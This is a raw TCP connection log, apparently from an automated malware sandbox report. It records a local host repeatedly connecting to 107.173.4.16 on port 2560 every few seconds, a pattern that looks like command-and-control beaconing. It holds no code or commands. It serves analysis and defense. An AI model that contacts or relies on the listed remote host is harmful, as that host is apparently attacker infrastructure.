                                              Dec 17, 2024 20:40:29.477279902 CET256050036107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:31.311975002 CET256050036107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:31.312217951 CET500362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:31.312217951 CET500362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:31.432004929 CET256050036107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:31.905164003 CET500372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:32.026669025 CET256050037107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:32.028861046 CET500372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:32.032473087 CET500372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:32.152154922 CET256050037107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:34.145520926 CET256050037107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:34.145600080 CET500372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:34.145638943 CET500372560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:34.265650034 CET256050037107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:34.717648983 CET500382560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:34.838238001 CET256050038107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:34.838521004 CET500382560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:34.842083931 CET500382560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:34.962687969 CET256050038107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:36.782011032 CET256050038107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:36.782135010 CET500382560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:36.783509016 CET500382560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:36.903172970 CET256050038107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:37.342439890 CET500392560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:37.462538004 CET256050039107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:37.462675095 CET500392560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:37.466346979 CET500392560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:37.586020947 CET256050039107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:39.483700991 CET256050039107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:39.486011982 CET500392560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:39.486239910 CET500392560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:39.605741978 CET256050039107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:40.014221907 CET500402560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:40.135060072 CET256050040107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:40.135200024 CET500402560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:40.144435883 CET500402560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:40.263966084 CET256050040107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:42.078912020 CET256050040107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:42.079096079 CET500402560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:42.083885908 CET500402560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:42.203661919 CET256050040107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:42.593372107 CET500412560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:42.714366913 CET256050041107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:42.714459896 CET500412560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:42.718162060 CET500412560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:42.843300104 CET256050041107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:44.655616999 CET256050041107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:44.655965090 CET500412560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:44.655965090 CET500412560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:44.777704000 CET256050041107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:45.155025005 CET500432560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:45.274616957 CET256050043107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:45.275043964 CET500432560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:45.278558969 CET500432560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:45.398183107 CET256050043107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:47.218514919 CET256050043107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:47.218645096 CET500432560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:47.218703985 CET500432560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:47.339076042 CET256050043107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:47.701859951 CET500442560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:47.823010921 CET256050044107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:47.823266983 CET500442560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:47.827164888 CET500442560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:47.947288036 CET256050044107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:49.766206980 CET256050044107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:49.767565012 CET500442560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:49.767565012 CET500442560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:49.894061089 CET256050044107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:50.249255896 CET500452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:50.369122982 CET256050045107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:50.369230032 CET500452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:50.373140097 CET500452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:50.493029118 CET256050045107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:52.337332010 CET256050045107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:52.337409019 CET500452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:52.337495089 CET500452560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:52.457482100 CET256050045107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:52.795574903 CET500462560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:52.918312073 CET256050046107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:52.919094086 CET500462560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:52.922655106 CET500462560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:53.042613029 CET256050046107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:54.878952026 CET256050046107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:54.879278898 CET500462560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:54.879278898 CET500462560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:54.999157906 CET256050046107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:55.311254025 CET500472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:55.472409010 CET256050047107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:55.475035906 CET500472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:55.478584051 CET500472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:55.598341942 CET256050047107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:57.412888050 CET256050047107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:57.415005922 CET500472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:57.415041924 CET500472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:57.535396099 CET256050047107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:57.842523098 CET500482560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:57.962008953 CET256050048107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:57.962913036 CET500482560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:57.966404915 CET500482560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:58.089407921 CET256050048107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:59.906807899 CET256050048107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:40:59.906873941 CET500482560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:40:59.906922102 CET500482560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:00.026519060 CET256050048107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:00.311294079 CET500492560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:00.431067944 CET256050049107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:00.431144953 CET500492560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:00.434297085 CET500492560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:00.554068089 CET256050049107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:02.446367025 CET256050049107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:02.448952913 CET500492560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:02.448952913 CET500492560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:02.568696022 CET256050049107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:02.842552900 CET500502560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:02.962578058 CET256050050107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:02.962713957 CET500502560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:02.966969967 CET500502560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:03.086508036 CET256050050107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:04.969489098 CET256050050107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:04.969604015 CET500502560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:04.969604015 CET500502560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:05.089319944 CET256050050107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:05.358177900 CET500512560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:05.477813005 CET256050051107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:05.477937937 CET500512560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:05.481420994 CET500512560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:05.601049900 CET256050051107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:07.421792984 CET256050051107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:07.421853065 CET500512560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:07.421930075 CET500512560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:07.541517019 CET256050051107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:07.796401024 CET500522560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:07.916296005 CET256050052107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:07.919328928 CET500522560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:07.922523975 CET500522560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:08.042279005 CET256050052107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:09.929872990 CET256050052107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:09.929975033 CET500522560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:09.930001974 CET500522560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:10.052580118 CET256050052107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:10.280097961 CET500532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:10.400047064 CET256050053107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:10.400943995 CET500532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:10.404051065 CET500532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:10.524049997 CET256050053107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:12.403124094 CET256050053107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:12.403413057 CET500532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:12.403520107 CET500532560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:12.574822903 CET256050053107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:12.748948097 CET500542560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:12.869065046 CET256050054107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:12.869184971 CET500542560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:12.873267889 CET500542560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:12.993318081 CET256050054107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:14.832297087 CET256050054107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:14.832451105 CET500542560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:14.832524061 CET500542560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:14.956182957 CET256050054107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:15.170689106 CET500552560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:15.312498093 CET256050055107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:15.312583923 CET500552560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:15.317342997 CET500552560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:15.440665007 CET256050055107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:17.352514029 CET256050055107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:17.352648020 CET500552560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:17.352776051 CET500552560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:17.477380037 CET256050055107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:17.670790911 CET500572560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:17.790668011 CET256050057107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:17.790900946 CET500572560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:17.797249079 CET500572560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:17.916982889 CET256050057107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:19.750016928 CET256050057107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:19.750082016 CET500572560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:19.750170946 CET500572560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:19.870812893 CET256050057107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:20.061172009 CET500582560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:20.182780981 CET256050058107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:20.182935953 CET500582560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:20.186297894 CET500582560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:20.306349039 CET256050058107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:22.141459942 CET256050058107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:22.144891977 CET500582560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:22.144922972 CET500582560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:22.264559984 CET256050058107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:22.451839924 CET500592560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:22.571610928 CET256050059107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:22.572943926 CET500592560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:22.576360941 CET500592560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:22.696465969 CET256050059107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:24.517755985 CET256050059107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:24.517832994 CET500592560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:24.517885923 CET500592560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:24.639153957 CET256050059107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:24.811736107 CET500602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:24.931487083 CET256050060107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:24.931596994 CET500602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:24.936497927 CET500602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:25.057426929 CET256050060107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:26.957314014 CET256050060107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:26.960948944 CET500602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:26.960994959 CET500602560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:27.080539942 CET256050060107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:27.248852968 CET500612560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:27.368551016 CET256050061107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:27.368911028 CET500612560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:27.372277021 CET500612560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:27.494286060 CET256050061107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:29.317013979 CET256050061107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:29.321029902 CET500612560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:29.321029902 CET500612560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:29.440618038 CET256050061107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:29.592659950 CET500622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:29.715925932 CET256050062107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:29.716051102 CET500622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:29.720824003 CET500622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:29.840437889 CET256050062107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:31.683664083 CET256050062107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:31.688832998 CET500622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:31.688915014 CET500622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:31.811702013 CET256050062107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:31.951894045 CET500632560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:32.071665049 CET256050063107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:32.071769953 CET500632560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:32.075864077 CET500632560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:32.195791006 CET256050063107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:34.018027067 CET256050063107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:34.018296957 CET500632560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:34.020350933 CET500632560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:34.140404940 CET256050063107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:34.319291115 CET500642560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:34.503926992 CET256050064107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:34.504019022 CET500642560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:34.508398056 CET500642560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:34.627976894 CET256050064107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:36.472942114 CET256050064107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:36.473112106 CET500642560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:36.473162889 CET500642560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:36.592865944 CET256050064107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:36.718713999 CET500652560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:36.839262009 CET256050065107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:36.840965033 CET500652560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:36.856591940 CET500652560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:36.978266954 CET256050065107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:38.785527945 CET256050065107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:38.785617113 CET500652560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:38.785685062 CET500652560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:38.905493021 CET256050065107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:39.030153036 CET500662560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:39.151407957 CET256050066107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:39.152970076 CET500662560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:39.157210112 CET500662560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:39.278105974 CET256050066107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:41.096782923 CET256050066107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:41.096857071 CET500662560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:41.096935034 CET500662560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:41.216736078 CET256050066107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:41.327430010 CET500672560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:41.447590113 CET256050067107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:41.447833061 CET500672560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:41.451719046 CET500672560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:41.572901011 CET256050067107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:43.391433001 CET256050067107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:43.391513109 CET500672560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:43.391602993 CET500672560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:43.511441946 CET256050067107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:43.623761892 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:43.746149063 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:43.746243954 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:43.750591993 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:43.870242119 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:45.735831976 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:45.735940933 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:45.736041069 CET500682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:45.860305071 CET256050068107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:45.951910019 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:46.071631908 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:46.075360060 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:46.078834057 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:46.198286057 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.065494061 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.065567970 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.065629959 CET500692560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.185224056 CET256050069107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.279982090 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.403342009 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:48.403465033 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.407149076 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:48.531469107 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.385267019 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.389076948 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.389076948 CET500702560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.508908033 CET256050070107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.592493057 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.712248087 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:50.712990999 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.716253042 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:50.835892916 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:52.656753063 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:52.656816959 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:52.656883001 CET500712560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:52.858201981 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:52.936346054 CET256050071107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:53.056338072 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:53.057045937 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:53.059794903 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:53.263989925 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.001574039 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.005008936 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.005171061 CET500722560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.125019073 CET256050072107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.201935053 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.323467970 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:55.323560953 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.328398943 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:55.449570894 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.271996021 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.272222042 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.272222042 CET500732560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.391935110 CET256050073107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.451847076 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.572401047 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:57.572674036 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.575747013 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:57.696449995 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.539107084 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.540966988 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.540997028 CET500742560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.661293983 CET256050074107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.717758894 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.837677956 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:41:59.837769032 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.841387033 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:41:59.961390972 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:01.786680937 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:01.786745071 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:01.786853075 CET500752560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:01.912431955 CET256050075107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:01.967556953 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:02.087204933 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:02.087450981 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:02.090277910 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:02.210441113 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.051667929 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.051786900 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.051786900 CET500762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:42:04.173903942 CET256050076107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:42:04.217573881 CET500772560192.168.2.6107.173.4.16
